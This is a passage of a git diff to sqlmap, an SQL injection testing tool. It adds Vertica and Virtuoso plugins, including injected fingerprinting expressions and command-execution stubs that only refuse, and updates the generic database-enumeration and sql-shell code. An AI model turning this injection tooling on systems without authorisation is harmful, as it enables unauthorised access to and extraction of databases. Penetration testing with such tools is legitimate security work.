"%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.VERTICA + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(VERTICA_ALIASES): + setDbms(DBMS.VERTICA) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.VERTICA + logger.info(infoMsg) + + # NOTE: Vertica works too without the CONVERT_TO() + result = inject.checkBooleanExpression("BITSTRING_TO_BINARY(NULL) IS NULL") + + if result: + infoMsg = "confirming %s" % DBMS.VERTICA + logger.info(infoMsg) + + result = inject.checkBooleanExpression("HEX_TO_INTEGER(NULL) IS NULL") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.VERTICA + logger.warning(warnMsg) + + return False + + setDbms(DBMS.VERTICA) + + self.getBanner() + + if not conf.extensiveFp: + return True + + infoMsg = "actively fingerprinting %s" % DBMS.VERTICA + logger.info(infoMsg) + + if inject.checkBooleanExpression("CALENDAR_HIERARCHY_DAY(NULL) IS NULL"): + Backend.setVersion(">= 9.0") + else: + Backend.setVersion("< 9.0") + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.VERTICA + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/vertica/syntax.py b/plugins/dbms/vertica/syntax.py new file mode 100644 index 00000000000..556a0273c22 --- /dev/null +++ b/plugins/dbms/vertica/syntax.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT (CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104)) FROM foobar" + True + """ + + def escaper(value): + return "(%s)" % "||".join("CHR(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/vertica/takeover.py b/plugins/dbms/vertica/takeover.py new file mode 100644 index 00000000000..93c3dbd3ea9 --- /dev/null +++ b/plugins/dbms/vertica/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on Vertica it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on Vertica it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on Vertica it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on Vertica it is not possible to establish an " + errMsg += "out-of-band connection" + raise 
SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/virtuoso/__init__.py b/plugins/dbms/virtuoso/__init__.py new file mode 100644 index 00000000000..07f68d2ce62 --- /dev/null +++ b/plugins/dbms/virtuoso/__init__.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import VIRTUOSO_SYSTEM_DBS +from lib.core.unescaper import unescaper +from plugins.dbms.virtuoso.enumeration import Enumeration +from plugins.dbms.virtuoso.filesystem import Filesystem +from plugins.dbms.virtuoso.fingerprint import Fingerprint +from plugins.dbms.virtuoso.syntax import Syntax +from plugins.dbms.virtuoso.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class VirtuosoMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Virtuoso methods + """ + + def __init__(self): + self.excludeDbsList = VIRTUOSO_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.VIRTUOSO] = Syntax.escape diff --git a/plugins/dbms/virtuoso/connector.py b/plugins/dbms/virtuoso/connector.py new file mode 100644 index 00000000000..e2980734d7f --- /dev/null +++ b/plugins/dbms/virtuoso/connector.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + def connect(self): + errMsg = "on Virtuoso it is not (currently) possible to establish a " + errMsg += "direct connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/virtuoso/enumeration.py b/plugins/dbms/virtuoso/enumeration.py new file mode 100644 index 00000000000..25443703c0f --- /dev/null +++ b/plugins/dbms/virtuoso/enumeration.py @@ -0,0 +1,56 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getPasswordHashes(self): + warnMsg = "on Virtuoso it is not possible to enumerate the user password hashes" + logger.warning(warnMsg) + + return {} + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on Virtuoso it is not possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getRoles(self, *args, **kwargs): + warnMsg = "on Virtuoso it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} + + def searchDb(self): + warnMsg = "on Virtuoso it is not possible to search databases" + logger.warning(warnMsg) + + return [] + + def searchTable(self): + warnMsg = "on Virtuoso it is not possible to search tables" + logger.warning(warnMsg) + + return [] + + def searchColumn(self): + warnMsg = "on Virtuoso it is not possible to search columns" + logger.warning(warnMsg) + + return [] + + def search(self): + warnMsg = "on Virtuoso search option is not available" + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on Virtuoso it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/virtuoso/filesystem.py 
b/plugins/dbms/virtuoso/filesystem.py new file mode 100644 index 00000000000..ada2ec7d61c --- /dev/null +++ b/plugins/dbms/virtuoso/filesystem.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def readFile(self, remoteFile): + errMsg = "on Virtuoso it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): + errMsg = "on Virtuoso it is not possible to write files" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/virtuoso/fingerprint.py b/plugins/dbms/virtuoso/fingerprint.py new file mode 100644 index 00000000000..b033511b8a6 --- /dev/null +++ b/plugins/dbms/virtuoso/fingerprint.py @@ -0,0 +1,89 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import VIRTUOSO_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.VIRTUOSO) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.VIRTUOSO + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(VIRTUOSO_ALIASES): + setDbms(DBMS.VIRTUOSO) + return True + + infoMsg = "testing %s" % DBMS.VIRTUOSO + logger.info(infoMsg) + + result = inject.checkBooleanExpression("GET_KEYWORD(NULL,NULL) IS NULL") + + if result: + infoMsg = "confirming %s" % DBMS.VIRTUOSO + logger.info(infoMsg) + + result = inject.checkBooleanExpression("RDF_NOW_IMPL() IS NOT NULL") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.VIRTUOSO + logger.warning(warnMsg) + + return False + + setDbms(DBMS.VIRTUOSO) + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.VIRTUOSO + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/virtuoso/syntax.py b/plugins/dbms/virtuoso/syntax.py new file mode 100644 index 00000000000..7ba5c8b9f38 --- /dev/null +++ b/plugins/dbms/virtuoso/syntax.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from 
lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CHR(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/virtuoso/takeover.py b/plugins/dbms/virtuoso/takeover.py new file mode 100644 index 00000000000..e91c8050796 --- /dev/null +++ b/plugins/dbms/virtuoso/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on Virtuoso it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on Virtuoso it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on Virtuoso it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on Virtuoso it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/generic/__init__.py b/plugins/generic/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/plugins/generic/__init__.py +++ b/plugins/generic/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/plugins/generic/connector.py b/plugins/generic/connector.py index 5edfcc33ec0..ee235b13b63 100644 --- a/plugins/generic/connector.py +++ b/plugins/generic/connector.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os @@ -12,7 +12,7 @@ from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapUndefinedMethod -class Connector: +class Connector(object): """ This class defines generic dbms protocol functionalities for plugins. 
""" @@ -20,23 +20,24 @@ class Connector: def __init__(self): self.connector = None self.cursor = None + self.hostname = None def initConnection(self): - self.user = conf.dbmsUser - self.password = conf.dbmsPass if conf.dbmsPass is not None else "" + self.user = conf.dbmsUser or "" + self.password = conf.dbmsPass or "" self.hostname = conf.hostname self.port = conf.port self.db = conf.dbmsDb - def connected(self): - infoMsg = "connection to %s server %s" % (conf.dbms, self.hostname) - infoMsg += ":%d established" % self.port - logger.info(infoMsg) + def printConnected(self): + if self.hostname and self.port: + infoMsg = "connection to %s server '%s:%d' established" % (conf.dbms, self.hostname, self.port) + logger.info(infoMsg) def closed(self): - infoMsg = "connection to %s server %s" % (conf.dbms, self.hostname) - infoMsg += ":%d closed" % self.port - logger.info(infoMsg) + if self.hostname and self.port: + infoMsg = "connection to %s server '%s:%d' closed" % (conf.dbms, self.hostname, self.port) + logger.info(infoMsg) self.connector = None self.cursor = None @@ -46,10 +47,12 @@ def initCursor(self): def close(self): try: - self.cursor.close() - self.connector.close() - except Exception, msg: - logger.debug(msg) + if self.cursor: + self.cursor.close() + if self.connector: + self.connector.close() + except Exception as ex: + logger.debug(ex) finally: self.closed() @@ -60,20 +63,20 @@ def checkFileDb(self): def connect(self): errMsg = "'connect' method must be defined " - errMsg += "into the specific DBMS plugin" + errMsg += "inside the specific DBMS plugin" raise SqlmapUndefinedMethod(errMsg) def fetchall(self): errMsg = "'fetchall' method must be defined " - errMsg += "into the specific DBMS plugin" + errMsg += "inside the specific DBMS plugin" raise SqlmapUndefinedMethod(errMsg) def execute(self, query): errMsg = "'execute' method must be defined " - errMsg += "into the specific DBMS plugin" + errMsg += "inside the specific DBMS plugin" raise SqlmapUndefinedMethod(errMsg) def select(self, query): errMsg = "'select' method must be defined " - errMsg += "into the specific DBMS plugin" + errMsg += "inside the specific DBMS plugin" raise SqlmapUndefinedMethod(errMsg) diff --git a/plugins/generic/custom.py b/plugins/generic/custom.py index 33a98e2e75f..de4ef537523 100644 --- a/plugins/generic/custom.py +++ b/plugins/generic/custom.py @@ -1,26 +1,37 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import print_function + import re +import sys from lib.core.common import Backend from lib.core.common import dataToStdout from lib.core.common import getSQLSnippet -from lib.core.common import isTechniqueAvailable -from lib.core.convert import utf8decode +from lib.core.common import isListLike +from lib.core.common import isStackingAvailable +from lib.core.common import joinValue +from lib.core.compat import xrange +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import logger from lib.core.dicts import SQL_STATEMENTS -from lib.core.enums import PAYLOAD +from lib.core.enums import AUTOCOMPLETE_TYPE +from lib.core.enums import DBMS +from lib.core.exception import SqlmapNoneDataException +from lib.core.settings import METADB_SUFFIX +from lib.core.settings import NULL from lib.core.settings import PARAMETER_SPLITTING_REGEX from 
lib.core.shell import autoCompletion from lib.request import inject +from thirdparty.six.moves import input as _input -class Custom: +class Custom(object): """ This class defines custom enumeration functionalities for plugins. """ @@ -33,38 +44,52 @@ def sqlQuery(self, query): sqlType = None query = query.rstrip(';') - for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): - for sqlStatement in sqlStatements: - if query.lower().startswith(sqlStatement): - sqlType = sqlTitle - break - if 'OPENROWSET' not in query.upper() and (not sqlType or 'SELECT' in sqlType): - infoMsg = "fetching %s query output: '%s'" % (sqlType if sqlType is not None else "SQL", query) - logger.info(infoMsg) + try: + for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): + for sqlStatement in sqlStatements: + if query.lower().startswith(sqlStatement): + sqlType = sqlTitle + break + + if not re.search(r"\b(OPENROWSET|INTO)\b", query, re.I) and (not sqlType or "SELECT" in sqlType): + infoMsg = "fetching %s query output: '%s'" % (sqlType if sqlType is not None else "SQL", query) + logger.info(infoMsg) + + if Backend.isDbms(DBMS.MSSQL): + match = re.search(r"(\bFROM\s+)([^\s]+)", query, re.I) + if match and match.group(2).count('.') == 1: + query = query.replace(match.group(0), "%s%s" % (match.group(1), match.group(2).replace('.', ".dbo."))) + + query = re.sub(r"(?i)\w+%s\.?" % METADB_SUFFIX, "", query) - output = inject.getValue(query, fromUser=True) + output = inject.getValue(query, fromUser=True) - return output - elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct: - warnMsg = "execution of custom SQL queries is only " + if sqlType and "SELECT" in sqlType and isListLike(output): + for i in xrange(len(output)): + if isListLike(output[i]): + output[i] = joinValue(output[i]) + + return output + elif not isStackingAvailable() and not conf.direct: + warnMsg = "execution of non-query SQL statements is only " warnMsg += "available when stacked queries are supported" - logger.warn(warnMsg) + logger.warning(warnMsg) return None - else: - if sqlType: - debugMsg = "executing %s query: '%s'" % (sqlType if sqlType is not None else "SQL", query) else: - debugMsg = "executing unknown SQL type query: '%s'" % query - logger.debug(debugMsg) + if sqlType: + infoMsg = "executing %s statement: '%s'" % (sqlType if sqlType is not None else "SQL", query) + else: + infoMsg = "executing unknown SQL command: '%s'" % query + logger.info(infoMsg) - inject.goStacked(query) + inject.goStacked(query) - debugMsg = "done" - logger.debug(debugMsg) + output = NULL - output = False + except SqlmapNoneDataException as ex: + logger.warning(ex) return output @@ -73,20 +98,25 @@ def sqlShell(self): infoMsg += "'x' or 'q' and press ENTER" logger.info(infoMsg) - autoCompletion(sqlShell=True) + autoCompletion(AUTOCOMPLETE_TYPE.SQL) while True: query = None try: - query = raw_input("sql-shell> ") - query = utf8decode(query) + query = _input("sql-shell> ") + query = getUnicode(query, encoding=sys.stdin.encoding) + query = query.strip("; ") + except UnicodeDecodeError: + print() + errMsg = "invalid user input" + logger.error(errMsg) except KeyboardInterrupt: - print + print() errMsg = "user aborted" logger.error(errMsg) except EOFError: - print + print() errMsg = "exit" logger.error(errMsg) break @@ -100,7 +130,7 @@ def sqlShell(self): output = self.sqlQuery(query) if output and output != "Quit": - conf.dumper.query(query, output) + conf.dumper.sqlQuery(query, output) elif not output: pass @@ -112,15 +142,18 @@ def sqlFile(self): infoMsg = 
"executing SQL statements from given file(s)" logger.info(infoMsg) - for sfile in re.split(PARAMETER_SPLITTING_REGEX, conf.sqlFile): - sfile = sfile.strip() + for filename in re.split(PARAMETER_SPLITTING_REGEX, conf.sqlFile): + filename = filename.strip() - if not sfile: + if not filename: continue - query = getSQLSnippet(Backend.getDbms(), sfile) + snippet = getSQLSnippet(Backend.getDbms(), filename) - infoMsg = "executing SQL statement%s from file '%s'" % ("s" if ";" in query else "", sfile) - logger.info(infoMsg) - - conf.dumper.query(query, self.sqlQuery(query)) + if snippet and all(query.strip().upper().startswith("SELECT") for query in (_ for _ in snippet.split(';' if ';' in snippet else '\n') if _)): + for query in (_ for _ in snippet.split(';' if ';' in snippet else '\n') if _): + query = query.strip() + if query: + conf.dumper.sqlQuery(query, self.sqlQuery(query)) + else: + conf.dumper.sqlQuery(snippet, self.sqlQuery(snippet)) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index 6ad8b1c041f..7f05d50ef38 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -1,14 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import re + from lib.core.agent import agent from lib.core.common import arrayizeValue from lib.core.common import Backend +from lib.core.common import filterNone from lib.core.common import filterPairValues +from lib.core.common import flattenValue from lib.core.common import getLimitRange from lib.core.common import isInferenceAvailable from lib.core.common import isListLike @@ -20,6 +24,9 @@ from lib.core.common import pushValue from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming +from lib.core.common import safeStringFormat +from lib.core.common import singleTimeLogMessage +from lib.core.common import singleTimeWarnMessage from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf @@ -27,20 +34,30 @@ from lib.core.data import logger from lib.core.data import paths from lib.core.data import queries +from lib.core.decorators import stackedmethod +from lib.core.dicts import ALTIBASE_TYPES from lib.core.dicts import FIREBIRD_TYPES +from lib.core.dicts import INFORMIX_TYPES from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS from lib.core.enums import EXPECTED +from lib.core.enums import FORK from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import CURRENT_DB +from lib.core.settings import METADB_SUFFIX +from lib.core.settings import PLUS_ONE_DBMSES +from lib.core.settings import REFLECTED_VALUE_MARKER +from lib.core.settings import UPPER_CASE_DBMSES +from lib.core.settings import VERTICA_DEFAULT_SCHEMA from lib.request import inject -from lib.techniques.brute.use import columnExists -from lib.techniques.brute.use import tableExists +from lib.utils.brute import columnExists +from lib.utils.brute import tableExists +from thirdparty import six -class Databases: +class Databases(object): """ This class defines databases' enumeration functionalities for plugins. 
""" @@ -52,6 +69,7 @@ def __init__(self): kb.data.cachedColumns = {} kb.data.cachedCounts = {} kb.data.dumpedTable = {} + kb.data.cachedStatements = [] def getCurrentDb(self): infoMsg = "fetching current database" @@ -62,6 +80,20 @@ def getCurrentDb(self): if not kb.data.currentDb: kb.data.currentDb = unArrayizeValue(inject.getValue(query, safeCharEncode=False)) + if not kb.data.currentDb and Backend.isDbms(DBMS.VERTICA): + kb.data.currentDb = VERTICA_DEFAULT_SCHEMA + + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.SNOWFLAKE): + warnMsg = "on %s you'll need to use " % Backend.getIdentifiedDbms() + warnMsg += "schema names for enumeration as the counterpart to database " + warnMsg += "names on other DBMSes" + singleTimeWarnMessage(warnMsg) + elif Backend.getIdentifiedDbms() in (DBMS.ALTIBASE, DBMS.CUBRID): + warnMsg = "on %s you'll need to use " % Backend.getIdentifiedDbms() + warnMsg += "user names for enumeration as the counterpart to database " + warnMsg += "names on other DBMSes" + singleTimeWarnMessage(warnMsg) + return kb.data.currentDb def getDbs(self): @@ -74,22 +106,24 @@ def getDbs(self): warnMsg = "information_schema not available, " warnMsg += "back-end DBMS is MySQL < 5. database " warnMsg += "names will be fetched from 'mysql' database" - logger.warn(warnMsg) + logger.warning(warnMsg) - elif Backend.isDbms(DBMS.ORACLE): - warnMsg = "schema names are going to be used on Oracle " + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.SNOWFLAKE): + warnMsg = "schema names are going to be used on %s " % Backend.getIdentifiedDbms() warnMsg += "for enumeration as the counterpart to database " warnMsg += "names on other DBMSes" - logger.warn(warnMsg) + logger.warning(warnMsg) infoMsg = "fetching database (schema) names" - elif Backend.isDbms(DBMS.DB2): - warnMsg = "schema names are going to be used on IBM DB2 " + + elif Backend.getIdentifiedDbms() in (DBMS.ALTIBASE, DBMS.CUBRID): + warnMsg = "user names are going to be used on %s " % Backend.getIdentifiedDbms() warnMsg += "for enumeration as the counterpart to database " warnMsg += "names on other DBMSes" - logger.warn(warnMsg) + logger.warning(warnMsg) + + infoMsg = "fetching database (user) names" - infoMsg = "fetching database (schema) names" else: infoMsg = "fetching database names" @@ -122,7 +156,7 @@ def getDbs(self): errMsg = "unable to retrieve the number of databases" logger.error(errMsg) else: - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) + plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES indexRange = getLimitRange(count, plusOne=plusOne) for index in indexRange: @@ -132,9 +166,10 @@ def getDbs(self): query = rootQuery.blind.query2 % index else: query = rootQuery.blind.query % index + db = unArrayizeValue(inject.getValue(query, union=False, error=False)) - if db: + if not isNoneValue(db): kb.data.cachedDbs.append(safeSQLIdentificatorNaming(db)) if not kb.data.cachedDbs and Backend.isDbms(DBMS.MSSQL): @@ -171,7 +206,7 @@ def getDbs(self): kb.data.cachedDbs.sort() if kb.data.cachedDbs: - kb.data.cachedDbs = list(set(kb.data.cachedDbs)) + kb.data.cachedDbs = [_ for _ in set(flattenValue(kb.data.cachedDbs)) if _] return kb.data.cachedDbs @@ -183,21 +218,24 @@ def getTables(self, bruteForce=None): if bruteForce is None: if 
Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - errMsg = "information_schema not available, " - errMsg += "back-end DBMS is MySQL < 5.0" - logger.error(errMsg) + warnMsg = "information_schema not available, " + warnMsg += "back-end DBMS is MySQL < 5.0" + logger.warning(warnMsg) + bruteForce = True + + elif Backend.getIdentifiedDbms() in (DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA): bruteForce = True - elif Backend.isDbms(DBMS.ACCESS): + elif Backend.getIdentifiedDbms() in (DBMS.ACCESS,): try: tables = self.getTables(False) except SqlmapNoneDataException: tables = None if not tables: - errMsg = "cannot retrieve table names, " - errMsg += "back-end DBMS is Access" - logger.error(errMsg) + warnMsg = "cannot retrieve table names, " + warnMsg += "back-end DBMS is %s" % Backend.getIdentifiedDbms() + logger.warning(warnMsg) bruteForce = True else: return tables @@ -205,19 +243,19 @@ def getTables(self, bruteForce=None): if conf.db == CURRENT_DB: conf.db = self.getCurrentDb() - if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if conf.db and Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: conf.db = conf.db.upper() if conf.db: - dbs = conf.db.split(",") + dbs = conf.db.split(',') else: dbs = self.getDbs() + dbs = [_ for _ in dbs if _ and _.strip()] + for db in dbs: dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db) - dbs = filter(None, dbs) - if bruteForce: resumeAvailable = False @@ -226,7 +264,7 @@ def getTables(self, bruteForce=None): resumeAvailable = True break - if resumeAvailable: + if resumeAvailable and not conf.freshQueries: for db, table in kb.brute.tables: if db == conf.db: if conf.db not in kb.data.cachedTables: @@ -236,114 +274,174 @@ def getTables(self, bruteForce=None): return kb.data.cachedTables - message = "do you want to use common table existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") + message = "do you want to use common table existence check? 
%s " % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB) else "[y/N/q]") + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() - if test[0] in ("n", "N"): + if choice == 'N': return - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException else: return tableExists(paths.COMMON_TABLES) infoMsg = "fetching tables for database" - infoMsg += "%s: '%s'" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, basestring) else db[0] for db in sorted(dbs))) + infoMsg += "%s: '%s'" % ("s" if len(dbs) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(unArrayizeValue(db)) for db in sorted(dbs))) logger.info(infoMsg) rootQuery = queries[Backend.getIdentifiedDbms()].tables if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - query = rootQuery.inband.query - condition = rootQuery.inband.condition if 'condition' in rootQuery.inband else None + values = [] - if condition: - if not Backend.isDbms(DBMS.SQLITE): - query += " WHERE %s" % condition - query += " IN (%s)" % ",".join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs)) + for query, condition in ((rootQuery.inband.query, getattr(rootQuery.inband, "condition", None)), (getattr(rootQuery.inband, "query2", None), getattr(rootQuery.inband, "condition2", None))): + if not isNoneValue(values) or not query: + break + + if condition: + if not Backend.isDbms(DBMS.SQLITE): + query += " WHERE %s" % condition - if conf.excludeSysDbs: - query += "".join(" AND %s != '%s'" % (condition, unsafeSQLIdentificatorNaming(db)) for db in self.excludeDbsList) - infoMsg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) - logger.info(infoMsg) + if conf.excludeSysDbs: + infoMsg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList)) + logger.info(infoMsg) + query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs) if db not in self.excludeDbsList) + else: + query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in 